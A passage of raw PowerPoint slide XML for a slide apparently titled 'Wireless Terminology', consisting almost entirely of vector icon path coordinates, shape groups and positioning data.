                    <a:pt x="149" y="0"/>
                    <a:pt x="156" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="0"/>
                    <a:pt x="168" y="5"/>
                    <a:pt x="168" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="140"/>
                    <a:pt x="168" y="140"/>
                    <a:pt x="168" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="147"/>
                    <a:pt x="163" y="152"/>
                    <a:pt x="156" y="152"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="108" y="152"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="152"/>
                    <a:pt x="96" y="147"/>
                    <a:pt x="96" y="140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7"/>
                    <a:pt x="101" y="32"/>
                    <a:pt x="108" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="32"/>
                    <a:pt x="120" y="37"/>
                    <a:pt x="120" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="140"/>
                    <a:pt x="120" y="140"/>
                    <a:pt x="120" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="147"/>
                    <a:pt x="115" y="152"/>
                    <a:pt x="108" y="152"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="60" y="152"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="152"/>
                    <a:pt x="48" y="147"/>
                    <a:pt x="48" y="140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48" y="69"/>
                    <a:pt x="53" y="64"/>
                    <a:pt x="60" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="64"/>
                    <a:pt x="72" y="69"/>
                    <a:pt x="72" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="140"/>
                    <a:pt x="72" y="140"/>
                    <a:pt x="72" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="67" y="152"/>
                    <a:pt x="60" y="152"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="12" y="152"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="152"/>
                    <a:pt x="0" y="147"/>
                    <a:pt x="0" y="140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101"/>
                    <a:pt x="5" y="96"/>
                    <a:pt x="12" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="96"/>
                    <a:pt x="24" y="101"/>
                    <a:pt x="24" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="140"/>
                    <a:pt x="24" y="140"/>
                    <a:pt x="24" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="147"/>
                    <a:pt x="19" y="152"/>
                    <a:pt x="12" y="15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66286D4-D89B-49FF-956F-AB2AB27518A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9395174" y="3941494"/>
            <a:ext cx="994987" cy="994987"/>
            <a:chOff x="9141356" y="3920588"/>
            <a:chExt cx="994987" cy="994987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="303" name="Oval 302"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9141356" y="3920588"/>
              <a:ext cx="994987" cy="994987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85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4" name="Freeform 174">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0DBC1FB-66D7-49CF-B15D-3BBC295EA6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33681" y="4156045"/>
              <a:ext cx="635368" cy="568232"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 220617 w 70"/>
                <a:gd name="T1" fmla="*/ 68684 h 49"/>
                <a:gd name="T2" fmla="*/ 120650 w 70"/>
                <a:gd name="T3" fmla="*/ 30908 h 49"/>
                <a:gd name="T4" fmla="*/ 24130 w 70"/>
                <a:gd name="T5" fmla="*/ 68684 h 49"/>
                <a:gd name="T6" fmla="*/ 20683 w 70"/>
                <a:gd name="T7" fmla="*/ 68684 h 49"/>
                <a:gd name="T8" fmla="*/ 0 w 70"/>
                <a:gd name="T9" fmla="*/ 48079 h 49"/>
                <a:gd name="T10" fmla="*/ 3447 w 70"/>
                <a:gd name="T11" fmla="*/ 44644 h 49"/>
                <a:gd name="T12" fmla="*/ 120650 w 70"/>
                <a:gd name="T13" fmla="*/ 0 h 49"/>
                <a:gd name="T14" fmla="*/ 241300 w 70"/>
                <a:gd name="T15" fmla="*/ 44644 h 49"/>
                <a:gd name="T16" fmla="*/ 241300 w 70"/>
                <a:gd name="T17" fmla="*/ 48079 h 49"/>
                <a:gd name="T18" fmla="*/ 220617 w 70"/>
                <a:gd name="T19" fmla="*/ 68684 h 49"/>
                <a:gd name="T20" fmla="*/ 220617 w 70"/>
                <a:gd name="T21" fmla="*/ 68684 h 49"/>
                <a:gd name="T22" fmla="*/ 186146 w 70"/>
                <a:gd name="T23" fmla="*/ 103026 h 49"/>
                <a:gd name="T24" fmla="*/ 120650 w 70"/>
                <a:gd name="T25" fmla="*/ 75552 h 49"/>
                <a:gd name="T26" fmla="*/ 55154 w 70"/>
                <a:gd name="T27" fmla="*/ 103026 h 49"/>
                <a:gd name="T28" fmla="*/ 34471 w 70"/>
                <a:gd name="T29" fmla="*/ 82420 h 49"/>
                <a:gd name="T30" fmla="*/ 34471 w 70"/>
                <a:gd name="T31" fmla="*/ 78986 h 49"/>
                <a:gd name="T32" fmla="*/ 120650 w 70"/>
                <a:gd name="T33" fmla="*/ 44644 h 49"/>
                <a:gd name="T34" fmla="*/ 206829 w 70"/>
                <a:gd name="T35" fmla="*/ 78986 h 49"/>
                <a:gd name="T36" fmla="*/ 210276 w 70"/>
                <a:gd name="T37" fmla="*/ 82420 h 49"/>
                <a:gd name="T38" fmla="*/ 189593 w 70"/>
                <a:gd name="T39" fmla="*/ 103026 h 49"/>
                <a:gd name="T40" fmla="*/ 186146 w 70"/>
                <a:gd name="T41" fmla="*/ 103026 h 49"/>
                <a:gd name="T42" fmla="*/ 120650 w 70"/>
                <a:gd name="T43" fmla="*/ 123631 h 49"/>
                <a:gd name="T44" fmla="*/ 89626 w 70"/>
                <a:gd name="T45" fmla="*/ 137367 h 49"/>
                <a:gd name="T46" fmla="*/ 68943 w 70"/>
                <a:gd name="T47" fmla="*/ 116762 h 49"/>
                <a:gd name="T48" fmla="*/ 68943 w 70"/>
                <a:gd name="T49" fmla="*/ 113328 h 49"/>
                <a:gd name="T50" fmla="*/ 120650 w 70"/>
                <a:gd name="T51" fmla="*/ 92723 h 49"/>
                <a:gd name="T52" fmla="*/ 175804 w 70"/>
                <a:gd name="T53" fmla="*/ 113328 h 49"/>
                <a:gd name="T54" fmla="*/ 175804 w 70"/>
                <a:gd name="T55" fmla="*/ 116762 h 49"/>
                <a:gd name="T56" fmla="*/ 155121 w 70"/>
                <a:gd name="T57" fmla="*/ 137367 h 49"/>
                <a:gd name="T58" fmla="*/ 120650 w 70"/>
                <a:gd name="T59" fmla="*/ 123631 h 49"/>
                <a:gd name="T60" fmla="*/ 99967 w 70"/>
                <a:gd name="T61" fmla="*/ 147670 h 49"/>
                <a:gd name="T62" fmla="*/ 120650 w 70"/>
                <a:gd name="T63" fmla="*/ 140802 h 49"/>
                <a:gd name="T64" fmla="*/ 141333 w 70"/>
                <a:gd name="T65" fmla="*/ 147670 h 49"/>
                <a:gd name="T66" fmla="*/ 120650 w 70"/>
                <a:gd name="T67" fmla="*/ 168275 h 49"/>
                <a:gd name="T68" fmla="*/ 99967 w 70"/>
                <a:gd name="T69" fmla="*/ 147670 h 4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0" h="49">
                  <a:moveTo>
                    <a:pt x="64" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="13"/>
                    <a:pt x="46" y="9"/>
                    <a:pt x="35" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="9"/>
                    <a:pt x="15" y="13"/>
                    <a:pt x="7" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="20"/>
                    <a:pt x="7" y="20"/>
                    <a:pt x="6" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="20"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="14"/>
                    <a:pt x="0" y="14"/>
                    <a:pt x="1" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="4"/>
                    <a:pt x="23" y="0"/>
                    <a:pt x="35" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="61" y="4"/>
                    <a:pt x="70" y="13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5"/>
                    <a:pt x="65" y="20"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="20"/>
                    <a:pt x="64" y="20"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="54" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="25"/>
                    <a:pt x="43" y="22"/>
                    <a:pt x="35" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="22"/>
                    <a:pt x="16" y="30"/>
                    <a:pt x="16" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="30"/>
                    <a:pt x="10" y="25"/>
                    <a:pt x="10" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="24"/>
                    <a:pt x="10" y="23"/>
                    <a:pt x="10" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="17"/>
                    <a:pt x="26" y="13"/>
                    <a:pt x="35" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="13"/>
                    <a:pt x="54" y="17"/>
                    <a:pt x="60" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="23"/>
                    <a:pt x="61" y="24"/>
                    <a:pt x="61" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="25"/>
                    <a:pt x="56" y="30"/>
                    <a:pt x="55" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="30"/>
                    <a:pt x="54" y="30"/>
                    <a:pt x="54" y="30"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="36"/>
                    <a:pt x="26" y="40"/>
                    <a:pt x="26" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="40"/>
                    <a:pt x="20" y="35"/>
                    <a:pt x="20" y="34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4" y="29"/>
                    <a:pt x="30" y="27"/>
                    <a:pt x="35" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="27"/>
                    <a:pt x="47" y="29"/>
                    <a:pt x="51" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="33"/>
                    <a:pt x="51" y="33"/>
                    <a:pt x="51" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="35"/>
                    <a:pt x="46" y="40"/>
                    <a:pt x="45" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="40"/>
                    <a:pt x="41" y="36"/>
                    <a:pt x="35" y="36"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="29" y="43"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="42"/>
                    <a:pt x="34" y="41"/>
                    <a:pt x="35" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="41"/>
                    <a:pt x="41" y="42"/>
                    <a:pt x="41" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="44"/>
                    <a:pt x="36" y="49"/>
                    <a:pt x="35" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="49"/>
                    <a:pt x="29" y="44"/>
                    <a:pt x="29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376" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2503056-410F-4E79-B955-711239A94A38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439616" y="159413"/>
            <a:ext cx="7312769" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/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Wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Terminology</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1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DCF51C4-0B07-4010-9457-D4046B78E15A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1824555" y="3941494"/>
            <a:ext cx="994987" cy="994987"/>
            <a:chOff x="1694396" y="3962400"/>
            <a:chExt cx="994987" cy="994987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="301" name="Oval 300"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1694396" y="3962400"/>
              <a:ext cx="994987" cy="9949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 w="285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Freeform 115">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96CB0B72-96E4-4CA7-8322-7B1345653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4387" y="4163540"/>
              <a:ext cx="475005" cy="592706"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 170867 w 400"/>
                <a:gd name="T1" fmla="*/ 55735 h 498"/>
                <a:gd name="T2" fmla="*/ 170867 w 400"/>
                <a:gd name="T3" fmla="*/ 55735 h 498"/>
                <a:gd name="T4" fmla="*/ 103597 w 400"/>
                <a:gd name="T5" fmla="*/ 4045 h 498"/>
                <a:gd name="T6" fmla="*/ 51574 w 400"/>
                <a:gd name="T7" fmla="*/ 67871 h 498"/>
                <a:gd name="T8" fmla="*/ 59647 w 400"/>
                <a:gd name="T9" fmla="*/ 95738 h 498"/>
                <a:gd name="T10" fmla="*/ 4036 w 400"/>
                <a:gd name="T11" fmla="*/ 182936 h 498"/>
                <a:gd name="T12" fmla="*/ 0 w 400"/>
                <a:gd name="T13" fmla="*/ 195072 h 498"/>
                <a:gd name="T14" fmla="*/ 4036 w 400"/>
                <a:gd name="T15" fmla="*/ 214849 h 498"/>
                <a:gd name="T16" fmla="*/ 12109 w 400"/>
                <a:gd name="T17" fmla="*/ 223389 h 498"/>
                <a:gd name="T18" fmla="*/ 27805 w 400"/>
                <a:gd name="T19" fmla="*/ 218894 h 498"/>
                <a:gd name="T20" fmla="*/ 39914 w 400"/>
                <a:gd name="T21" fmla="*/ 211253 h 498"/>
                <a:gd name="T22" fmla="*/ 63683 w 400"/>
                <a:gd name="T23" fmla="*/ 175295 h 498"/>
                <a:gd name="T24" fmla="*/ 63683 w 400"/>
                <a:gd name="T25" fmla="*/ 175295 h 498"/>
                <a:gd name="T26" fmla="*/ 79379 w 400"/>
                <a:gd name="T27" fmla="*/ 171250 h 498"/>
                <a:gd name="T28" fmla="*/ 103597 w 400"/>
                <a:gd name="T29" fmla="*/ 127651 h 498"/>
                <a:gd name="T30" fmla="*/ 131402 w 400"/>
                <a:gd name="T31" fmla="*/ 127651 h 498"/>
                <a:gd name="T32" fmla="*/ 170867 w 400"/>
                <a:gd name="T33" fmla="*/ 55735 h 498"/>
                <a:gd name="T34" fmla="*/ 143062 w 400"/>
                <a:gd name="T35" fmla="*/ 71466 h 498"/>
                <a:gd name="T36" fmla="*/ 143062 w 400"/>
                <a:gd name="T37" fmla="*/ 71466 h 498"/>
                <a:gd name="T38" fmla="*/ 114808 w 400"/>
                <a:gd name="T39" fmla="*/ 63825 h 498"/>
                <a:gd name="T40" fmla="*/ 99112 w 400"/>
                <a:gd name="T41" fmla="*/ 35958 h 498"/>
                <a:gd name="T42" fmla="*/ 139026 w 400"/>
                <a:gd name="T43" fmla="*/ 31913 h 498"/>
                <a:gd name="T44" fmla="*/ 143062 w 400"/>
                <a:gd name="T45" fmla="*/ 71466 h 49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00" h="498">
                  <a:moveTo>
                    <a:pt x="381" y="124"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="381" y="124"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="44"/>
                    <a:pt x="301" y="0"/>
                    <a:pt x="231" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="27"/>
                    <a:pt x="106" y="80"/>
                    <a:pt x="115" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="168"/>
                    <a:pt x="124" y="195"/>
                    <a:pt x="133" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="407"/>
                    <a:pt x="9" y="407"/>
                    <a:pt x="9" y="407"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="407"/>
                    <a:pt x="0" y="425"/>
                    <a:pt x="0" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="478"/>
                    <a:pt x="9" y="478"/>
                    <a:pt x="9" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="487"/>
                    <a:pt x="18" y="497"/>
                    <a:pt x="27" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="487"/>
                    <a:pt x="62" y="487"/>
                    <a:pt x="62" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="487"/>
                    <a:pt x="80" y="478"/>
                    <a:pt x="89" y="470"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="390"/>
                    <a:pt x="142" y="390"/>
                    <a:pt x="142" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="381"/>
                    <a:pt x="177" y="381"/>
                    <a:pt x="177" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="284"/>
                    <a:pt x="231" y="284"/>
                    <a:pt x="231" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="293"/>
                    <a:pt x="284" y="284"/>
                    <a:pt x="293" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="275"/>
                    <a:pt x="399" y="195"/>
                    <a:pt x="381" y="124"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="319" y="159"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="319" y="159"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="187"/>
                    <a:pt x="284" y="168"/>
                    <a:pt x="256" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="124"/>
                    <a:pt x="203" y="115"/>
                    <a:pt x="221" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="53"/>
                    <a:pt x="284" y="44"/>
                    <a:pt x="310" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="89"/>
                    <a:pt x="346" y="133"/>
                    <a:pt x="319" y="1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endParaRPr lang="en-US"/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BF87680-4DC2-4AC6-AA5E-7F10E3341656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5604286" y="1181100"/>
            <a:ext cx="983428" cy="982794"/>
            <a:chOff x="5724145" y="1225297"/>
            <a:chExt cx="983428" cy="982794"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="248" name="Oval 247"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5724145" y="1225297"/>
              <a:ext cx="983428" cy="982794"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="285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Freeform 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{780A52B8-F48B-45E6-83F4-20D85F0BA7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09907" y="1401241"/>
              <a:ext cx="584168" cy="599054"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 344062 w 224"/>
                <a:gd name="T1" fmla="*/ 214461 h 256"/>
                <a:gd name="T2" fmla="*/ 305111 w 224"/>
                <a:gd name="T3" fmla="*/ 214461 h 256"/>
                <a:gd name="T4" fmla="*/ 285636 w 224"/>
                <a:gd name="T5" fmla="*/ 194965 h 256"/>
                <a:gd name="T6" fmla="*/ 285636 w 224"/>
                <a:gd name="T7" fmla="*/ 116979 h 256"/>
                <a:gd name="T8" fmla="*/ 305111 w 224"/>
                <a:gd name="T9" fmla="*/ 97482 h 256"/>
                <a:gd name="T10" fmla="*/ 344062 w 224"/>
                <a:gd name="T11" fmla="*/ 97482 h 256"/>
                <a:gd name="T12" fmla="*/ 363537 w 224"/>
                <a:gd name="T13" fmla="*/ 116979 h 256"/>
                <a:gd name="T14" fmla="*/ 363537 w 224"/>
                <a:gd name="T15" fmla="*/ 194965 h 256"/>
                <a:gd name="T16" fmla="*/ 344062 w 224"/>
                <a:gd name="T17" fmla="*/ 214461 h 256"/>
                <a:gd name="T18" fmla="*/ 305111 w 224"/>
                <a:gd name="T19" fmla="*/ 19496 h 256"/>
                <a:gd name="T20" fmla="*/ 324587 w 224"/>
                <a:gd name="T21" fmla="*/ 0 h 256"/>
                <a:gd name="T22" fmla="*/ 344062 w 224"/>
                <a:gd name="T23" fmla="*/ 19496 h 256"/>
                <a:gd name="T24" fmla="*/ 344062 w 224"/>
                <a:gd name="T25" fmla="*/ 77986 h 256"/>
                <a:gd name="T26" fmla="*/ 305111 w 224"/>
                <a:gd name="T27" fmla="*/ 77986 h 256"/>
                <a:gd name="T28" fmla="*/ 305111 w 224"/>
                <a:gd name="T29" fmla="*/ 19496 h 256"/>
                <a:gd name="T30" fmla="*/ 201244 w 224"/>
                <a:gd name="T31" fmla="*/ 318443 h 256"/>
                <a:gd name="T32" fmla="*/ 162293 w 224"/>
                <a:gd name="T33" fmla="*/ 318443 h 256"/>
                <a:gd name="T34" fmla="*/ 142818 w 224"/>
                <a:gd name="T35" fmla="*/ 298946 h 256"/>
                <a:gd name="T36" fmla="*/ 142818 w 224"/>
                <a:gd name="T37" fmla="*/ 220960 h 256"/>
                <a:gd name="T38" fmla="*/ 162293 w 224"/>
                <a:gd name="T39" fmla="*/ 201464 h 256"/>
                <a:gd name="T40" fmla="*/ 201244 w 224"/>
                <a:gd name="T41" fmla="*/ 201464 h 256"/>
                <a:gd name="T42" fmla="*/ 220719 w 224"/>
                <a:gd name="T43" fmla="*/ 220960 h 256"/>
                <a:gd name="T44" fmla="*/ 220719 w 224"/>
                <a:gd name="T45" fmla="*/ 298946 h 256"/>
                <a:gd name="T46" fmla="*/ 201244 w 224"/>
                <a:gd name="T47" fmla="*/ 318443 h 256"/>
                <a:gd name="T48" fmla="*/ 162293 w 224"/>
                <a:gd name="T49" fmla="*/ 19496 h 256"/>
                <a:gd name="T50" fmla="*/ 181769 w 224"/>
                <a:gd name="T51" fmla="*/ 0 h 256"/>
                <a:gd name="T52" fmla="*/ 201244 w 224"/>
                <a:gd name="T53" fmla="*/ 19496 h 256"/>
                <a:gd name="T54" fmla="*/ 201244 w 224"/>
                <a:gd name="T55" fmla="*/ 181967 h 256"/>
                <a:gd name="T56" fmla="*/ 162293 w 224"/>
                <a:gd name="T57" fmla="*/ 181967 h 256"/>
                <a:gd name="T58" fmla="*/ 162293 w 224"/>
                <a:gd name="T59" fmla="*/ 19496 h 256"/>
                <a:gd name="T60" fmla="*/ 58426 w 224"/>
                <a:gd name="T61" fmla="*/ 266452 h 256"/>
                <a:gd name="T62" fmla="*/ 19475 w 224"/>
                <a:gd name="T63" fmla="*/ 266452 h 256"/>
                <a:gd name="T64" fmla="*/ 0 w 224"/>
                <a:gd name="T65" fmla="*/ 246955 h 256"/>
                <a:gd name="T66" fmla="*/ 0 w 224"/>
                <a:gd name="T67" fmla="*/ 168970 h 256"/>
                <a:gd name="T68" fmla="*/ 19475 w 224"/>
                <a:gd name="T69" fmla="*/ 149473 h 256"/>
                <a:gd name="T70" fmla="*/ 58426 w 224"/>
                <a:gd name="T71" fmla="*/ 149473 h 256"/>
                <a:gd name="T72" fmla="*/ 77901 w 224"/>
                <a:gd name="T73" fmla="*/ 168970 h 256"/>
                <a:gd name="T74" fmla="*/ 77901 w 224"/>
                <a:gd name="T75" fmla="*/ 246955 h 256"/>
                <a:gd name="T76" fmla="*/ 58426 w 224"/>
                <a:gd name="T77" fmla="*/ 266452 h 256"/>
                <a:gd name="T78" fmla="*/ 19475 w 224"/>
                <a:gd name="T79" fmla="*/ 19496 h 256"/>
                <a:gd name="T80" fmla="*/ 38950 w 224"/>
                <a:gd name="T81" fmla="*/ 0 h 256"/>
                <a:gd name="T82" fmla="*/ 58426 w 224"/>
                <a:gd name="T83" fmla="*/ 19496 h 256"/>
                <a:gd name="T84" fmla="*/ 58426 w 224"/>
                <a:gd name="T85" fmla="*/ 129977 h 256"/>
                <a:gd name="T86" fmla="*/ 19475 w 224"/>
                <a:gd name="T87" fmla="*/ 129977 h 256"/>
                <a:gd name="T88" fmla="*/ 19475 w 224"/>
                <a:gd name="T89" fmla="*/ 19496 h 256"/>
                <a:gd name="T90" fmla="*/ 58426 w 224"/>
                <a:gd name="T91" fmla="*/ 396429 h 256"/>
                <a:gd name="T92" fmla="*/ 38950 w 224"/>
                <a:gd name="T93" fmla="*/ 415925 h 256"/>
                <a:gd name="T94" fmla="*/ 19475 w 224"/>
                <a:gd name="T95" fmla="*/ 396429 h 256"/>
                <a:gd name="T96" fmla="*/ 19475 w 224"/>
                <a:gd name="T97" fmla="*/ 285948 h 256"/>
                <a:gd name="T98" fmla="*/ 58426 w 224"/>
                <a:gd name="T99" fmla="*/ 285948 h 256"/>
                <a:gd name="T100" fmla="*/ 58426 w 224"/>
                <a:gd name="T101" fmla="*/ 396429 h 256"/>
                <a:gd name="T102" fmla="*/ 201244 w 224"/>
                <a:gd name="T103" fmla="*/ 396429 h 256"/>
                <a:gd name="T104" fmla="*/ 181769 w 224"/>
                <a:gd name="T105" fmla="*/ 415925 h 256"/>
                <a:gd name="T106" fmla="*/ 162293 w 224"/>
                <a:gd name="T107" fmla="*/ 396429 h 256"/>
                <a:gd name="T108" fmla="*/ 162293 w 224"/>
                <a:gd name="T109" fmla="*/ 337939 h 256"/>
                <a:gd name="T110" fmla="*/ 201244 w 224"/>
                <a:gd name="T111" fmla="*/ 337939 h 256"/>
                <a:gd name="T112" fmla="*/ 201244 w 224"/>
                <a:gd name="T113" fmla="*/ 396429 h 256"/>
                <a:gd name="T114" fmla="*/ 344062 w 224"/>
                <a:gd name="T115" fmla="*/ 396429 h 256"/>
                <a:gd name="T116" fmla="*/ 324587 w 224"/>
                <a:gd name="T117" fmla="*/ 415925 h 256"/>
                <a:gd name="T118" fmla="*/ 305111 w 224"/>
                <a:gd name="T119" fmla="*/ 396429 h 256"/>
                <a:gd name="T120" fmla="*/ 305111 w 224"/>
                <a:gd name="T121" fmla="*/ 233958 h 256"/>
                <a:gd name="T122" fmla="*/ 344062 w 224"/>
                <a:gd name="T123" fmla="*/ 233958 h 256"/>
                <a:gd name="T124" fmla="*/ 344062 w 224"/>
                <a:gd name="T125" fmla="*/ 396429 h 2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24" h="256">
                  <a:moveTo>
                    <a:pt x="212" y="132"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="132"/>
